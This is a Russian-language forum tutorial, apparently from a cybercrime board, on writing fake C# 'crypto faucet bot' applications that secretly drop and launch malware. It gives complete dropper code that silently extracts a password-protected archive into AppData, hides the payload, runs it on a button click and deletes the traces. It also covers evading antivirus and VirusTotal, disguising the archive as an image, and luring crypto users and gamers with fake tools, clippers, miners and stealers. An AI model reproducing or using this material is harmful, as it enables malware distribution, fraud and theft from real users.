Статься ориентирована на новичков и профи в этой сфере, подойдет каждому.
Идея изначально была моя, она проста и легка как весенний одуванчик, сейчас решил ее дополнить и разложить по полкам, схема приносит ежедневный хороший и очень качественный прогруз.
Работать будем в Visual Studio 2019 C#
Понадобиться архиватор 7zip
Не пугайтесь те кто не шарит в VS и не когда не кодил! Начать не когда не поздно я разложил все полкам куда жать и что делать.
Весь код закоментил почти каждую строку.
Будут нужны красочные темы для форм C#
Я специально подготовил для вас свою коллекцию качаем тут:
https://anonfiles.com/R9f25299n6/Theme_C_zip
Пароль
xss.is
Мы будем писать с вами фейковые софта различного рода для распространения вашей малвари.
Прошу заранее вас определиться с тематикой вашего софта, в статье я выбрал тематику крипты.
Софт распространять мы будем там где могут попасться мамонты в этой сфере, а это различные форумы по криптовалюте так как тут проще всего.
Перейдем от теории к практике:
Запускаем Visual Studio и создаем проект Windows Forms
жмем далее и выбираем .Net 4.5 имя проекта будет в моем случаи Crex24, я буду делать
“бота который собирает с кранов на бирже Crex24 различную крипту в авто-режиме”.
В проекте сразу перейдем к дизайну формы, тут дело фантазии каждого, основной код который будет запускать вашу малварь мы пропишем позднее.
Для начала изменить стандартный дизайн формы на свой, для этого в начале статьи я дал ссылку на скачивания пака тем.
Я выбрал тему
clsNeoBuxTheme.cs
она довольно красивая как по мне.
После жмем в верху VS
Сборка > пересобрать проект
Слева появится меню Компоненты Crex24, сразу выбираем тему главной формы
Так же добавим
ControlMenu
и размещаем там где это нужно.
Разверните вкладку
Все формы Windows Forms
и так же кидаем:
- Label – 4шт
- TextBox - 4шт
- 2шт Кнопки
- 2шт checkBox
После красиво размещаем их на форме и переименовываем, изменить названия компонентов можно тут:
Мы получаем форму примерно такого вида:
Красиво, доверчиво.
Теперь самое главное, как эта форма будет пропихивать нашу малварь, для начала желательно криптануть ваш билд малвари, форму криптовать не нужно и да-же обфусцировать поверьте, ее можно слить на ВТ и детекты не придут.
Определимся когда будет запускаться наша малварь, не будем запускать сразу при запуске формы, можем спалиться. Запустим малварь например когда жертва нажмет кнопку Start
Мы не будем качать ваш exe билд со сторонних серверов, и не будем таскать его вместе с фейковым софтом в 1 exe. Мы так же не будем держать ваш exe рядом с программой в открытом виде. Для примера вместо малвари я буду использовать putty.exe Переименуем putty.exe в update.exe
Далее я буду использовать архиватор 7zip Щелкаем по exe “малвари” update.exe правой кнопкой и выбираем добавить к архиву.
Уровень сжатия Ультра, формат архива zip
Пароль любой у меня будет:
123
Наш архив update.zip назовем: config.y
В этом архиве находится ваша малварь под паролем, да же если его слить на ВТ ваш exe не улетит туда же.
Возвращаемся к нашему фейковому софту:
Теперь нам надо сделать так что бы наш софт сумел
скрыто распаковать этот архив и запустить exe
от туда
при условии нажатия кнопки старт Подключим необходимые NuGet пакеты:
Жмем по вкладке Проект > управление пакетами
Вкладка обзор, в поле поиска вводим
SharpZipLib
нужен для распаковки архива устанавливаем
После в поле поиска вводим
Costura.Fody
запихнет вашу dll SharpZipLib в сам билд формы что бы не таскать его отдельно, и так же установить.
Жмем 2 раза на форму в пустом месте и пишем код распаковки и запуска:
Далее разбор кода, вы так же можете скачать уже готовые исходники в конце статьи.
C#:
Скопировать в буфер обмена
//Подрубим юзинги
using System;
using System.Text;
using System.Windows.Forms;
using ICSharpCode.SharpZipLib.Core;
using ICSharpCode.SharpZipLib.Zip;
using System.Diagnostics;
using System.IO;
using System.Threading;
namespace Crex24
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void clsButtonGreen1_Click(object sender, EventArgs e)
{
string dir = Environment.GetEnvironmentVariable("AppData") + "\\Update"; // Путь к папке куда распакуем exe
if (!Directory.Exists(dir))
File.SetAttributes("config.y", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя сам архив
//Далее шифруем наш пароль от архива и распаковываем
//Зашифровать пароль можно тут: http://base64.ru/
//В моем случаи пароль на архив config.y был 123 по этому после закодирования пароля в
//base64 у меня будет пароль выглядеть так: MTIz
string password = Encoding.ASCII.GetString(Convert.FromBase64String("MTIz")); // Пароль от архива зашифрованный в base64
ExtractZipFile("config.y", password, dir + "\\"); //Распакуем архив
File.Delete("config.y"); //Удаляем архив
//Далее создаем поток и запускаем нашу малварь при клике на кнопку Start:
new Thread(() =>
{
try
{
File.SetAttributes(dir + "\\update.exe", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя
Process proc = Process.Start(dir + "\\update.exe"); //Запускаем exe малвари
// 2 строки далее можно удалить или оставить смотря как вам нужно
proc.WaitForExit(); //Ждем завершения работы малвари (если требуется)
File.Delete(dir + "\\update.exe"); //Удаляем exe малвари (если требуется)
}
catch (Exception)
{
}
}).Start();
}
// Функция для распаковки архива
private static void ExtractZipFile(string archiveFilenameIn, string password, string outFolder)
{
{
ZipFile zf = null;
try
{
FileStream fs = File.OpenRead(archiveFilenameIn);
zf = new ZipFile(fs);
if (!String.IsNullOrEmpty(password))
{
zf.Password = password;
}
foreach (ZipEntry zipEntry in zf)
{
if (!zipEntry.IsFile)
{
continue;
}
String entryFileName = zipEntry.Name;
byte[] buffer = new byte[4096];
Stream zipStream = zf.GetInputStream(zipEntry);
String fullZipToPath = Path.Combine(outFolder, entryFileName);
string directoryName = Path.GetDirectoryName(fullZipToPath);
if (directoryName.Length > 0)
Directory.CreateDirectory(directoryName);
using (FileStream streamWriter = File.Create(fullZipToPath))
{
StreamUtils.Copy(zipStream, streamWriter, buffer);
}
}
}
catch (Exception ex)
{
throw ex;
}
finally
{
if (zf != null)
{
zf.IsStreamOwner = true;
zf.Close();
}
}
}
}
private void TextBox2_TextChanged(object sender, EventArgs e)
{
}
}
}Добавляем красивую иконку для софта, правой кнопкой по проекту > свойства > Значек и манифест
На раб. столе, создаем папку CranBot Crex24 и кладем в нее наш
exe фейка
+ рядом
config.y архив соответсвенно.
Ох сейчас вы скажете зачем но поверьте все ОК!
Заливаем наш exe файл фека на ВТ. И поверьте такой детект я наблюдаю уже почти год.
VirusTotal
VirusTotal
www.virustotal.com
Вить это у нас по сути простой разархиватор zip архивов.
Ваша малварь в архиве под паролем, да же если ее зальют на вт толку от этого не будет.
Не верите, вот вам пример, собсвенно почему я и выбрал CrexBot для основы своего фейка:
Кран-бот для Crex24.com + 20$ в день
Кран-бот для Crex24.com + 20$ в день
bitcointalk.org
Там я да же ВТ приложил той же датой, он с тех пор не изменился. И до сих пор идут инсталы.
Да пост я выложил в ру сегменте, но выкладывал я только ради проверки схемы, далее я перешел на пендосов.
Это лиш 1 тема размещенная на 1 форуме, таких тем по разным зарубежным форумам о крипте у меня много, за год разных фейков софтов я написал уже порядка 50шт, вы же если не так ленивы как я, за 1 год наклепаете более 5000 софтов... представьте какой профит будет? Но работа будет монотонная. Ноя уверенно скажу что вы не 1к $ срубите! тем же клиппером BTC адресов.
При чем на 1 софт уходит 10-15 минут, просто изменив вид формы под нужный софт понакидав туда различных компонентов и все.
Как вы поняли схема очень легкая, профитная, идает хорошую защиту от слива вашей малвари на ВТ.
Распространять конечно же придется в 1 рахиве в 1 папке что бы 2 файла forma.exe и config.y лежали рядом.
Так же можно рядом с формой создать папку img понакидать туда разных картинок, иконок флагов более 100шт и вместо config.y назвать архив us.png этот файл смешается среди кучи картинок. А наш софт будет брать именно его, распаковывать и запускать.
Видео обзор работы готового фейка:
На видео я показал логику работы софта и еще хочу дполнить словами:
- Запуск формы
- Нажатие на кнопку старт
- Срабатывает распаковка архива config.y в папку C:\Users\\AppData\Roaming\update
- Скрывает update.exe малвари (в моем случаи putty)
- Удаляет изначальный архив рядом с exe формы config.y
- Запускает update.exe
- Ждем завершения программы
- Удаляет update.exe
Вот и вся схема.
Кстати данный мануал отлично подойдет для распространения майнера, т.к очень легко понаделать фейковые формы читов различных игр. Как мы знаем у геймеров за частую нормальные карты стоят в пк. Не шарю в фортнайт но видел там аховые цены на аккаунты, понаделайте различные софта типо читы, трейнеры, подсчет статистики если для этой игры такое можно я уже сказал не шарю, и хапайте стилаком данные аки.
Дело фантазии и можно наклепать что угодно, представьте что форма это полотно как фотошопе.
Я не рекомендую обфусцировать сам софт формы, смысла нет + начнет палится со временем, а так будет жить и жить. К тому же мы вить не будет распространять подобное на площадках где будут декомпилить его.
Еще 1 плюс этой схемы это хороший обход рантайма некоторых АВ при запуске вашего exe
Собственно как и общеал вот вам готовый исходник который мы разобрали с вами в этой статье:
Crex24.zip - AnonFiles
anonfiles.com
Пак тем для форм:
https://anonfiles.com/R9f25299n6/Theme_C_zip
Пароль
xss.is
Все тех. вопросы задаем тут, отвечу всем.
Вложения